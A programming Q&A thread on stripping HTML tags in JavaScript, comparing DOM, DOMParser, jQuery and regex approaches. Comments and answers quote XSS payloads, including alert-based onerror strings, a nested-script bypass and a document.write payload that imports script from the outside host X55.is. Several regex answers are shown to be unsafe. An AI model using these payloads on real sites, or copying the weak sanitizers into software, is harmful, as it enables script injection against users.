# Strip HTML tags from text using plain JavaScript

Tags: javascript, html, string

How to strip off HTML tags from a string using plain JavaScript only, not using a library?

Answer (score 911, accepted):

If you're running in a browser, then the easiest way is just to [let the browser do it for you...](http://jsfiddle.net/8JSZX/)

```
function stripHtml(html)
{
   let tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}
```

Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can *still* let the browser do the work for you - [see Saba's answer on using the now widely-available DOMParser](https://stackoverflow.com/questions/822452/strip-html-from-text-javascript/47140708#47140708).

Comment: Just remember that this approach is rather inconsistent and will fail to strip certain characters in certain browsers. For example, in Prototype.js, we use this approach for performance, but work around some of the deficiencies - http://github.com/kangax/prototype/blob/a223833c8b49ae55f03b1e1a3a5b7e9fb647c139/src/lang/string.js#L476

Comment: Remember your whitespace will be messed about. I used to use this method, and then had problems as certain product codes contained double spaces, which ended up as single spaces after I got the innerText back from the DIV. Then the product codes did not match up later in the application.

Comment: @Magnus Smith: Yes, if whitespace is a concern - or really, if you have any need for this text that doesn't directly involve the specific HTML DOM you're working with - then you're better off using one of the other solutions given here. The primary advantages of this method are that it is 1) trivial, and 2) will reliably process tags, whitespace, entities, comments, etc. in *the same way as the browser you're running in*. That's frequently useful for web client code, but not necessarily appropriate for interacting with other systems where the rules are different.

Comment: Requisite reference on this topic: http://stackoverflow.com/questions/1359469/innertext-works-in-ie-but-not-in-firefox/1359822#1359822

Comment: @Tom: [seems to work just fine](http://jsbin.com/udebu3/) in the IE6 I test with.

Comment: Don't use this with HTML from an untrusted source.  To see why, try running `strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")`

Comment: This will also strip any <br />'s between text. And that could concatenate the text together, if there should not be any blank spaces between the <br />'s the preceding text and/or the following text

Comment: If html contains images(img tags), the images will be requested by the browser. That's not good.

Comment: This will also strip string using `<`: `a<b` becomes `a`.

Comment: @MikeSamuel maaaaaan Mike Samuel, is there a safe way to strip html from something?

Comment: @Ziggy: if you need to sanitize *untrusted* HTML using JavaScript, you might want to start here: http://stackoverflow.com/questions/295566/sanitize-rewrite-html-on-the-client-side

Comment: What about using the answer from this: http://stackoverflow.com/questions/822452/strip-html-from-text-javascript

Comment: @Ziggy, Doesn't that link point to this thread?  Shog9's link to the caja sanitizer is the best approach IMHO.

Comment: appreciate that you did not use jquery

Comment: Don't forget to use trim()

Comment: @MikeSamuel The problem is the first two lines, though, not the last line: What is unsafe is calling `Document​.create​Element` and assigning to `Element​.inner​HTML` with untrusted (HTML) input. Reading from `Node.textContent` or `Node.innerText` is safe, and you don’t even need the latter.

Comment: @caw, I'm afraid I don't understand what you're getting at.  I agree that the third line isn't problematic in isolation, but I never suggested it was, and if you want to classify individual lines as safe/unsafe, why worry about the first line?  Creating a div is not unsafe.

Comment: You made the general statement “Don't use this with HTML from an untrusted source”, which is true, but can be made more specific, i.e. “Don't assign to `Element​.inner​HTML` from an untrusted source”. Reading `Node.textContent`, which is much more important and relevant for this question, is totally fine.

Comment: If you need to strip only the first and last HTML tag, see: https://stackoverflow.com/a/2095792/8839237

Answer (score 793):

```
myString.replace(/<[^>]*>?/gm, '');
```

Comment: Doesn't work for `<img src=http://www.google.com.kh/images/srpr/nav_logo27.png onload="alert(42)" ` if you're injecting via `document.write` or concatenating with a string that contains a `>` before injecting via `innerHTML`.

Comment: @Mike, you should do the replacement after the string has actually been finished

Comment: that is not sufficient.  If two different scripts do two different writes : `document.write('<img src=... onload=alert(42) '.replace(/<.*?>/g, '');` and `document.write('</div>')` then the second write closes the incomplete tag from the first.  Also, `.` does not match `\n`, so your regex does not work on `'<img src=...\nonload=alert(42)>'` which is a valid complete tag.

Comment: @MikeSamuel not quite sure your fix works correctly on the problem you suggested. If the problem you proposed is that two different writes hold parts of one tag, e.g. the first "<img src=..." and the second closing the image tag ">blablabla<br />". Then while your regex will erase the first string completely, it will ignore the initial > bracket in the second string. Did I understand your test case correctly?

Comment: @PerishableDave, I agree that the `>` will be left in the second.  That's not an injection hazard though.  The hazard occurs due to `<` left in the first, which causes the HTML parser to be in a context other than [data state](http://www.w3.org/TR/html5/tokenization.html#data-state) when the second starts.  Note there is no transition from data state on `>`.

Comment: @MikeSamuel Did we decide on this answer yet? Naive user here ready to copy-paste.

Comment: @Ziggy, no.  This answer is still not safe even if you make the close `>` optional.  Consider `"<script\r>alert(42)</script\r>"`.

Comment: This also, I believe, gets completely confused if given something like `<button onClick="dostuff('>');"></button>`
Assuming correctly written HTML, you still need to take into account that a greater than sign might be somewhere in the quoted text in an attribute. Also you would want to remove all the text inside of `<script>` tags, at least.

Comment: @AntonioMax, I've answered this question [ad nauseam](http://stackoverflow.com/a/430240/20394), but to the substance of your question, because **security critical code shouldn't be copied & pasted.**  You should download a library, and keep it up-to-date and patched so that you're secure against recently discovered vulnerabilities and to changes in browsers.

Comment: @MikeSamuel That was awesome. We're on the same page and your comment on that link is just right, thank you.

Comment: Could you continue to loop through this expression until the text no longer contains any `<>`, assuming that the text you're trying to find doesn't have any either?

Comment: The solution shown above does not replace "&nbsp;". The "jQuery(html).text();" does that job.

Comment: This answer is far better than others as I think anyone shall be able use and add other characters that they want or might want to remove. If any data is coming from database with escape characters like &lt, &gt, etc. The regular expression is the only way that is properly applicable in all the cases.

Comment: suppose there are html comment in <!-- --> tag then how this will work?

Comment: `m` in `/<(?:.|\n)*?>/gm` is not needed because you don't use `^` and `$` inside the regex. See [*"The multiline mode is enabled by the flag /.../m. It only affects the behavior of ^ and $."*](https://javascript.info/regexp-multiline-mode). I've tested and it works without `m`.

Comment: Would be nice to have some explanations (what cases it handles, limitations, explanations about the regex itself...) and unit tests

Comment: a simple character replace: `myString.replace(/[<]/g, '&lt;').replace(/[>]/g, '&gt;');`

Comment: nice, short and clean

Comment: how come no one pointed to https://stackoverflow.com/a/1732454/501765 yet?

Comment: @MikeSamuel I do not think the `?` you added in `/<[^>]*>?/gm` is needed or even correct. Wouldn't it replace any `<` in the text?

Comment: @Agostino.  It's necessary if you want to remove the tag from `Foo<plaintext`. The browser will happily parse many tags at the end of an input, and if you're stripping tags from a string so that you can `document.write` it, the tag could be completed by a '>' in text that follows.

Comment: @MikeSamuel Will it also strip any literal `<` in the text, e.g. `3<4`? If so, I would at least add a note about this in the answer.

Comment: You might want to decode html-entities in text after removing tags (e.g. &amp;, &nbsp; ). This library can help you https://www.npmjs.com/package/html-entities

Comment: `myString.replace(/<.*?>/gm, '')`

Answer (score 300):

I would like to share an edited version of the [**Shog9**'s approved answer](https://stackoverflow.com/a/822486/5317080).

---

As **Mike Samuel** pointed with a comment, that function can execute inline javascript code.
But **Shog9** is right when saying "let the browser do it for you..."

so.. here my edited version, using [DOMParser](https://developer.mozilla.org/en-US/docs/Web/API/DOMParser):

```
function strip(html){
   let doc = new DOMParser().parseFromString(html, 'text/html');
   return doc.body.textContent || "";
}
```

here the code to test the inline javascript:

```
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
```

Also, it does not request resources on parse (like images)

```
strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")
```

Comment: It's worth to add that this solution work only in browser.

Comment: This is not strip tags, but more like PHP htmlspecialchars(). Still useful for me.

Comment: Note that this also removes whitespace from the beginning of the text.

Comment: This seems to be *much* faster than @Shog9's answer

Comment: also, it does not try to [parse html using regex](https://stackoverflow.com/a/1732454/501765)

Comment: This should be the accepted answer because it's the safest and fastest way to do

Comment: What does the or in the return does? Looks like this function will return a boolean.

Comment: It won't return a boolean; it will return `doc.body.textContent` if it is truthy, or `""` otherwise, i.e. the first item that is true when turned into a boolean.

Comment: This doesn't seem to strip HTML tags recursively. How can I recursively parse HTML into text? Thanks.

Comment: We have used this, but found that it doesn't work with sth like `\"><script>document.write('<img src=//X55.is OnLoad=import(src)>');</script>`. Calling strip() recursively  in case some tags still exists fixes that https://stackoverflow.com/a/76424919/15266227

Answer (score 280):

Simplest way:

```
jQuery(html).text();
```

That retrieves all the text from a string of html.

Comment: We always use jQuery for projects since invariably our projects have a lot of Javascript. Therefore we didn't add bulk, we took advantage of existing API code...

Comment: You use it, but the OP might not. the question was about Javascript NOT JQuery.

Comment: If you are using CKEditor, you already have jQuery loading. But to get all of the actual characters for an accurate count, you need to trim the result: chars = jQuery(editor.getData()).text().trim())

Comment: It's still a useful answer for people who need to do the same thing as the OP (like me) and don't mind using jQuery (like me), not to mention, it could have been useful to the OP if they were considering using jQuery. The point of the site is to share knowledge.  Keep in mind that the chilling effect you might have by chastising useful answers without good reason.

Comment: @Dementic shockingly, I find the threads with multiple answers to be the most useful, because often a secondary answer meets my exact needs, while the primary answer meets the general case.

Comment: That will not work if you some part of string is not wrapped in html tag. e.g.  "<b>Error:</b> Please enter a valid email" will return only "Error:"

Comment: The comment by Mike Samuel above applies here as well. Don't use this with HTML from an untrusted source. To see why, try running `jQuery("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>").text();`

Comment: @dementic: in the tags there is also jQuery, so I do not see why this would not be a valid answer.. +1 helped me

Comment: @IgorLacik - if you check the edits, when i wrote the comment Jquery was not in the tags, it was added because of the jquery answers.

Comment: You should wrap it in a HTML element to make it valid for text strings as well: `$('<i>').html(html).text()`. This will also work backend in node.js.

Comment: @JanneAukia I was curious so I made a fiddle. http://jsfiddle.net/gPdZm/1/ I would expect the alert to be run twice: once when the page loads, and then once more when we evaluate the untrusted JS. Is that not right? Or does the alert only fire the first time it is evaluated by anything?

Comment: This is not effective performance wise since it will create a dom element first which would trigger the loading of images if any. Stripping the html text suggested by @nickf is a better idea.

Comment: This will not turn `<br>` into '"\r\n"', so a multiline text may be broken if you run just that code. For single line text it should be ok, though.

Comment: I tried this with <img src="myimage.jpg" onload="alert('hi');" /> and the javascript still executes even though the image tags are stripped.

Comment: works with angular as well: `angular.element(html).text();` (the actual call is delegated to jquery lite)

Comment: This will not work if 'html' has plain string. 
e.g 
`jQuery("<a>abc</a>").text()` will output "abc". However `jQuery("abc").text()` will output "" (expected abc)

Comment: This still executes probably dangerous code `jQuery('<span>Text :) <img src="a" onerror="alert(1)"></span>').text()`

Comment: `jQuery('<span>').html(html).text();` not `jQuery(html).text();`

Comment: in case it's dynamic, $('some string').text() gives "" (empty string)

Comment: The question asks about javascript. Jquery is not javascript, jquery is a javascript library.

Comment: This answer was written over 10 years ago when jQuery was likely in wider use. I updated the question to more accurately reflect the original intent. That will make this answer obsolete and should be deleted. However it is historically useful and should be left as a comment.

Answer (score 61):

As an extension to the jQuery method, if your string might not contain HTML (eg if you are trying to remove HTML from a form field)

```
jQuery(html).text();
```

will return an empty string if there is no HTML

Use:

```
jQuery('<p>' + html + '</p>').text();
```

instead.

**Update:**
As has been pointed out in the comments, in some circumstances this solution will execute javascript contained within `html` if the value of `html` could be influenced by an attacker, use a different solution.

Comment: Or `$("<p>").html(html).text();`

Comment: This still executes probably dangerous code `jQuery('<span>Text :) <img src="a" onerror="alert(1)"></span>').text()`

Comment: try jQuery("aa&#X003c;script>alert(1)&#X003c;/script>a").text();

Answer (score 48):

### Converting HTML for Plain Text emailing keeping hyperlinks (a href) intact

The above function posted by hypoxide works fine, but I was after something that would basically convert HTML created in a Web RichText editor (for example FCKEditor) and clear out all HTML but leave all the Links due the fact that I wanted both the HTML and the plain text version to aid creating the correct parts to an STMP email (both HTML and plain text).

After a long time of searching Google myself and my collegues came up with this using the regex engine in Javascript:

```
str='this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
';
str=str.replace(/<br>/gi, "\n");
str=str.replace(/<p.*>/gi, "\n");
str=str.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<(?:.|\s)*?>/g, "");
```

the `str` variable starts out like this:

```
this string has <i>html</i> code i want to <b>remove</b><br>Link Number 1 -><a href="http://www.bbc.co.uk">BBC</a> Link Number 1<br><p>Now back to normal text and stuff</p>
```

and then after the code has run it looks like this:-

```
this string has html code i want to remove
Link Number 1 -> BBC (Link->http://www.bbc.co.uk)  Link Number 1


Now back to normal text and stuff
```

As you can see the all the HTML has been removed and the Link have been persevered with the hyperlinked text is still intact. Also I have replaced the `<p>` and `<br>` tags with `\n` (newline char) so that some sort of visual formatting has been retained.

To change the link format (eg. `BBC (Link->http://www.bbc.co.uk)` ) just edit the `$2 (Link->$1)`, where `$1` is the href URL/URI and the `$2` is the hyperlinked text. With the links directly in body of the plain text most SMTP Mail Clients convert these so the user has the ability to click on them.

Hope you find this useful.

Comment: It doesn't handle "&nbsp;"

Comment: obligatory caveat: https://stackoverflow.com/a/1732454/501765

Answer (score 37):

An improvement to the accepted answer.

```
function strip(html)
{
   var tmp = document.implementation.createHTMLDocument("New").body;
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}
```

This way something running like this will do no harm:

```
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
```

Firefox, Chromium and Explorer 9+ are safe.
Opera Presto is still vulnerable.
Also images mentioned in the strings are not downloaded in Chromium and Firefox saving http requests.

Comment: This is some of the way there, but isn't safe from `<script><script>alert();`

Comment: That doesn't run any scripts here in Chromium/Opera/Firefox on Linux, so why isn't it safe?

Comment: My apologies, I must have miss-tested, I probably forgot to click run again on the jsFiddle.

Comment: The "New" argument is superfluous, I think?

Comment: According to the [specs](https://developer.mozilla.org/en-US/docs/Web/API/DOMImplementation/createHTMLDocument) it's optional nowadays, but it wasn't always.

Comment: strip("aa&#X003c;script>alert(1)&#X003c;/script>a")

Answer (score 36):

This should do the work on any Javascript environment (NodeJS included).

```js
    const text = `
    <html lang="en">
      <head>
        <style type="text/css">*{color:red}</style>
        <script>alert('hello')</script>
      </head>
      <body><b>This is some text</b><br/><body>
    </html>`;
    
    // Remove style tags and content
    text.replace(/<style[^>]*>.*<\/style>/g, '')
        // Remove script tags and content
        .replace(/<script[^>]*>.*<\/script>/g, '')
        // Remove all opening, closing and orphan HTML tags
        .replace(/<[^>]+>/g, '')
        // Remove leading spaces and repeated CR/LF
        .replace(/([\r\n]+ +)+/g, '');
```

Comment: @pstanton could you give a working example of your statement ?

Comment: `<html><style..>* {font-family:comic-sans;}</style>Some Text</html>`

Comment: @pstanton I have fixed the code and added comments, sorry for the late response.

Comment: please consider reading these caveats: https://stackoverflow.com/a/1732454/501765

Comment: Since there are no start of string or end of string anchors, the `m` pattern modifier is pointless.  Since the first two patterns have common starts and finished, perhaps consolidate them by capturing the tagname and then using a backreference for the ending tag.

Comment: @mickmackusa indeed, apart of that using a XML parser is the best way to strip out the tags you want as törzsmókus commented above.

Answer (score 22):

```
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
```

This is a regex version, which is more resilient to malformed HTML, like:

**Unclosed tags**

`Some text <img`

**"<", ">" inside tag attributes**

`Some text <img alt="x > y">`

**Newlines**

`Some <a
href="http://google.com">`

The code

```
var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
```

Comment: How could you flip this to do literally the opposite? I want to use `string.replace()` on ONLY the text part, and leave any HTML tags and their attributes unchanged.

Comment: My personal favourite, I would also add to remove newlines like:

    `const deTagged = myString.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, '');
    const deNewlined = deTagged.replace(/\n/g, '');`

Answer (score 19):

I altered [Jibberboy2000's answer](https://stackoverflow.com/a/1237620/238722) to include several `<BR />` tag formats, remove everything inside `<SCRIPT>` and `<STYLE>` tags, format the resulting HTML by removing multiple line breaks and spaces and convert some HTML-encoded code into normal. After some testing it appears that you can convert most of full web pages into simple text where page title and content are retained.

In the simple example,

```
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--comment-->

<head>

<title>This is my title</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style>

    body {margin-top: 15px;}
    a { color: #D80C1F; font-weight:bold; text-decoration:none; }

</style>
</head>

<body>
    <center>
        This string has <i>html</i> code i want to <b>remove</b><br>
        In this line <a href="http://www.bbc.co.uk">BBC</a> with link is mentioned.<br/>Now back to &quot;normal text&quot; and stuff using &lt;html encoding&gt;                 
    </center>
</body>
</html>
```

becomes

> This is my title
>
> This string has html code i want to remove
>
> In this line BBC (http://www.bbc.co.uk) with link is mentioned.
>
> Now back to "normal text" and stuff using

The JavaScript function and test page look this:

```
function convertHtmlToText() {
    var inputText = document.getElementById("input").value;
    var returnText = "" + inputText;

    //-- remove BR tags and replace them with line break
    returnText=returnText.replace(/<br>/gi, "\n");
    returnText=returnText.replace(/<br\s\/>/gi, "\n");
    returnText=returnText.replace(/<br\/>/gi, "\n");

    //-- remove P and A tags but preserve what's inside of them
    returnText=returnText.replace(/<p.*>/gi, "\n");
    returnText=returnText.replace(/<a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 ($1)");

    //-- remove all inside SCRIPT and STYLE tags
    returnText=returnText.replace(/<script.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/script>/gi, "");
    returnText=returnText.replace(/<style.*>[\w\W]{1,}(.*?)[\w\W]{1,}<\/style>/gi, "");
    //-- remove all else
    returnText=returnText.replace(/<(?:.|\s)*?>/g, "");

    //-- get rid of more than 2 multiple line breaks:
    returnText=returnText.replace(/(?:(?:\r\n|\r|\n)\s*){2,}/gim, "\n\n");

    //-- get rid of more than 2 spaces:
    returnText = returnText.replace(/ +(?= )/g,'');

    //-- get rid of html-encoded characters:
    returnText=returnText.replace(/&nbsp;/gi," ");
    returnText=returnText.replace(/&amp;/gi,"&");
    returnText=returnText.replace(/&quot;/gi,'"');
    returnText=returnText.replace(/&lt;/gi,'<');
    returnText=returnText.replace(/&gt;/gi,'>');

    //-- return
    document.getElementById("output").value = returnText;
}
```

It was used with this HTML:

```
<textarea id="input" style="width: 400px; height: 300px;"></textarea><br />
<button onclick="convertHtmlToText()">CONVERT</button><br />
<textarea id="output" style="width: 400px; height: 300px;"></textarea><br />
```

Comment: I like this solution because it has treatment of html special characters... but still not nearly enough of them... the best answer for me would deal with all of them. (which is probably what jquery does).

Comment: I think `/<p.*>/gi` should be `/<p.*?>/gi`.

Comment: Note that to remove all `<br>` tags you could use a good regular expression instead: `/<br\s*\/?>/` that way you have just one replace instead of 3. Also it seems to me that except for the decoding of entities you can have a single regex, something like this: `/<[a-z].*?\/?>/`.

Comment: Nice script. But what about table content? Any idea how can it be displayed

Comment: @DanielGerson, encoding html gets real hairy, real quick, but the [best approach seems to be using the he library](https://stackoverflow.com/a/57702435/1366033)

Comment: this fuction has a lot if itinerations which might lead to a memory leak in multiple instances of long texts.

Answer (score 15):

from CSS tricks:

https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

```js
const originalString = `
  <div>
    <p>Hey that's <span>somthing</span></p>
  </div>
`;

const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

console.log(strippedString);
```

Comment: This fails to remove what is inside <script> and <style> tags but otherwise it is the cleanest solution.

Answer (score 8):

Another, admittedly less elegant solution than nickf's or Shog9's, would be to recursively walk the DOM starting at the <body> tag and append each text node.

```
var bodyContent = document.getElementsByTagName('body')[0];
var result = appendTextNodes(bodyContent);

function appendTextNodes(element) {
    var text = '';

    // Loop through the childNodes of the passed in element
    for (var i = 0, len = element.childNodes.length; i < len; i++) {
        // Get a reference to the current child
        var node = element.childNodes[i];
        // Append the node's value if it's a text node
        if (node.nodeType == 3) {
            text += node.nodeValue;
        }
        // Recurse through the node's children, if there are any
        if (node.childNodes.length > 0) {
            appendTextNodes(node);
        }
    }
    // Return the final result
    return text;
}
```

Comment: yikes. if you're going to create a DOM tree out of your string, then just use shog's way!

Comment: Yes, my solution wields a sledge-hammer where a regular hammer is more appropriate :-). And I agree that yours and Shog9's solutions are better, and basically said as much in the answer. I also failed to reflect in my response that the html is already contained in a string, rendering my answer essentially useless as regards the original question anyway. :-(

Comment: To be fair, this has value - if you absolutely must preserve /all/ of the text, then this has at least a decent shot at capturing newlines, tabs, carriage returns, etc... Then again, nickf's solution should do the same, and do much faster... eh.

Answer (score 8):

```js
const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)
```

Comment: doesn't work in next js as it is server side rendered but nice solution for traditional applications. 

use this instead - const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");

Answer (score 7):

If you want to keep the links and the structure of the content (h1, h2, etc) then you should check out [TextVersionJS](http://textversionjs.com/) You can use it with any HTML, although it was created to convert an HTML email to plain text.

The usage is very simple. For example in node.js:

```
var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";

var textVersion = createTextVersion(yourHtml);
```

Or in the browser with pure js:

```
<script src="textversion.js"></script>
<script>
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
</script>
```

It also works with require.js:

```
define(["textversionjs"], function(createTextVersion) {
  var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
  var textVersion = createTextVersion(yourHtml);
});
```

Answer (score 6):

It is also possible to use the fantastic [htmlparser2](https://github.com/fb55/htmlparser2) pure JS HTML parser. Here is a working demo:

```
var htmlparser = require('htmlparser2');

var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';

var result = [];

var parser = new htmlparser.Parser({
    ontext: function(text){
        result.push(text);
    }
}, {decodeEntities: true});

parser.write(body);
parser.end();

result.join('');
```

The output will be `This is a simple example.`

See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html

This works in both node and the browser if you pack your web application using a tool like webpack.

Answer (score 6):

For easier solution, try this => https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/

```
var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");
```

Comment: Which characters in your pattern are made case-insensitive by that `i` pattern modifier? I see no need for capturing parentheses -- anywhere in the pattern. Bad copy-pasta?  Maybe someone should whisper to Chris Coyier.

Answer (score 5):

A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.

```
function removeTags(string, array){
  return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
  function f(array, value){
    return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
  }
}

var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>
```

Answer (score 4):

I made some modifications to original Jibberboy2000 script
Hope it'll be usefull for someone

```
str = '**ANY HTML CONTENT HERE**';

str=str.replace(/<\s*br\/*>/gi, "\n");
str=str.replace(/<\s*a.*href="(.*?)".*>(.*?)<\/a>/gi, " $2 (Link->$1) ");
str=str.replace(/<\s*\/*.+?>/ig, "\n");
str=str.replace(/ {2,}/gi, " ");
str=str.replace(/\n+\s*/gi, "\n\n");
```

Answer (score 4):

After trying all of the answers mentioned most if not all of them had edge cases and couldn't completely support my needs.

I started exploring how php does it and came across the php.js lib which replicates the strip_tags method here: http://phpjs.org/functions/strip_tags/

Comment: This is a neat function and well documented. However, it can be made faster when `allowed == ''` which I think is what the OP asked for, which is nearly what Byron answered below (Byron only got the `[^>]` wrong.)

Comment: If you use the `allowed` param you are vulnerable to XSS: 
`stripTags('<p onclick="alert(1)">mytext</p>', '<p>')` returns `<p onclick="alert(1)">mytext</p>`

Answer (score 4):

```
function stripHTML(my_string){
    var charArr   = my_string.split(''),
        resultArr = [],
        htmlZone  = 0,
        quoteZone = 0;
    for( x=0; x < charArr.length; x++ ){
     switch( charArr[x] + htmlZone + quoteZone ){
       case "<00" : htmlZone  = 1;break;
       case ">10" : htmlZone  = 0;resultArr.push(' ');break;
       case '"10' : quoteZone = 1;break;
       case "'10" : quoteZone = 2;break;
       case '"11' : 
       case "'12" : quoteZone = 0;break;
       default    : if(!htmlZone){ resultArr.push(charArr[x]); }
     }
    }
    return resultArr.join('');
}
```

Accounts for > inside attributes and `<img onerror="javascript">` in newly created dom elements.

usage:

```
clean_string = stripHTML("string with <html> in it")
```

demo:

https://jsfiddle.net/gaby_de_wilde/pqayphzd/

demo of top answer doing the terrible things:

https://jsfiddle.net/gaby_de_wilde/6f0jymL6/1/

Comment: You'll need to handle escaped quotes inside an attribute value too (e.g. `string with <a malicious="attribute \">this text should be removed, but is not">example</a>`).

Answer (score 4):

A very good library would be [`sanitize-html`](https://www.npmjs.com/package/sanitize-html) which is a pure JavaScript function and it could help in any environment.

My case was on React Native I needed to remove all HTML tags from the given texts. so I created this wrapper function:

```js
import sanitizer from 'sanitize-html';

const textSanitizer = (textWithHTML: string): string =>
  sanitizer(textWithHTML, {
    allowedTags: [],
  });

export default textSanitizer;
```

Now by using my `textSanitizer`, I can have got the pure text contents.

Comment: so far the only NPM package that can sanitize som very strange HTML (such as `<iframe srcdoc="<script src='XXXXXXX'></script>" style="display: none" data-web="YYYYYYY" data-hash="ZZZZZZZZZZZZZ"></iframe> `

Answer (score 3):

Here's a version which sorta addresses @MikeSamuel's security concern:

```
function strip(html)
{
   try {
       var doc = document.implementation.createDocument('http://www.w3.org/1999/xhtml', 'html', null);
       doc.documentElement.innerHTML = html;
       return doc.documentElement.textContent||doc.documentElement.innerText;
   } catch(e) {
       return "";
   }
}
```

Note, it will return an empty string if the HTML markup isn't valid XML (aka, tags must be closed and attributes must be quoted). This isn't ideal, but does avoid the issue of having the security exploit potential.

If not having valid XML markup is a requirement for you, you could try using:

```
var doc = document.implementation.createHTMLDocument("");
```

but that isn't a perfect solution either for other reasons.

Comment: That will fail in many circumstances if the text comes from user input (textarea or contenteditable widget...)

Answer (score 3):

I just needed to strip out the `<a>` tags and replace them with the text of the link.

This seems to work great.

```
htmlContent= htmlContent.replace(/<a.*href="(.*?)">/g, '');
htmlContent= htmlContent.replace(/<\/a>/g, '');
```

Comment: This only applies for a tags and needs tweaking for being a wide function.

Comment: Yeah, plus an anchor tag could have many other attributes such as the `title="..."`.

Answer (score 2):

I think the easiest way is to just use Regular Expressions as someone mentioned above. Although there's no reason to use a bunch of them. Try:

```
stringWithHTML = stringWithHTML.replace(/<\/?[a-z][a-z0-9]*[^<>]*>/ig, "");
```

Comment: Don't do this if you care about security. If the user input is this: '<scr<script>ipt>alert(42);</scr</script>ipt>' then the stripped version will be this: '<script>alert(42);</script>'. So this is an XSS vulnerability.

Comment: You should change the `[^<>]` with `[^>]` because a valid tag cannot include a `<` character, then the XSS vulnerability disappears.

Answer (score 2):

Below code allows you to retain some html tags  while stripping all others

```
function strip_tags(input, allowed) {

  allowed = (((allowed || '') + '')
    .toLowerCase()
    .match(/<[a-z][a-z0-9]*>/g) || [])
    .join(''); // making sure the allowed arg is a string containing only tags in lowercase (<a><b><c>)

  var tags = /<\/?([a-z][a-z0-9]*)\b[^>]*>/gi,
      commentsAndPhpTags = /<!--[\s\S]*?-->|<\?(?:php)?[\s\S]*?\?>/gi;

  return input.replace(commentsAndPhpTags, '')
      .replace(tags, function($0, $1) {
          return allowed.indexOf('<' + $1.toLowerCase() + '>') > -1 ? $0 : '';
      });
}
```

Comment: You should quote the source (`phpjs`). 
If you use the `allowed` param you are vulnerable to XSS: 
`stripTags('<p onclick="alert(1)">mytext</p>', '<p>')` returns `<p onclick="alert(1)">mytext</p>`

Answer (score 2):

The accepted answer works fine mostly, however in IE if the `html` string is `null` you get the `"null"` (instead of ''). Fixed:

```
function strip(html)
{
   if (html == null) return "";
   var tmp = document.createElement("DIV");
   tmp.innerHTML = html;
   return tmp.textContent || tmp.innerText || "";
}
```

Answer (score 2):

A safer way to strip the html with jQuery is to first use [jQuery.parseHTML](http://api.jquery.com/jQuery.parseHTML/) to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.

```js
function stripHtml(unsafe) {
    return $($.parseHTML(unsafe)).text();
}
```

Can safely strip html from:

```html
<img src="unknown.gif" onerror="console.log('running injections');">
```

And other exploits.

nJoy!

Answer (score 2):

If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the [striptags](https://www.npmjs.com/package/striptags) npm package.

```js
import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one

striptags('<p>An HTML string</p>');
```

Answer (score 2):

```
const strip=(text) =>{
    return (new DOMParser()?.parseFromString(text,"text/html"))
    ?.body?.textContent
}

const value=document.getElementById("idOfEl").value

const cleanText=strip(value)
```

Answer (score 2):

To add to the DOMParser solution. Our team found that it was still possible to inject malicious script using the basic solution.

`\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'`

`\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>`

We found that it was best to parse it recursively if any tags still exist after the initial parse.

```js
function stripHTML(str) {
  const parsedHTML = new DOMParser().parseFromString(str, "text/html");
  const text = parsedHTML.body.textContent;

  if (/(<([^>]+)>)/gi.test(text)) {
    return stripHTML(text);
  }

  return text || "";
}
```

Answer (score 1):

With jQuery you can simply retrieving it by using

```
$('#elementID').text()
```

Answer (score 1):

I have created a working regular expression myself:

```
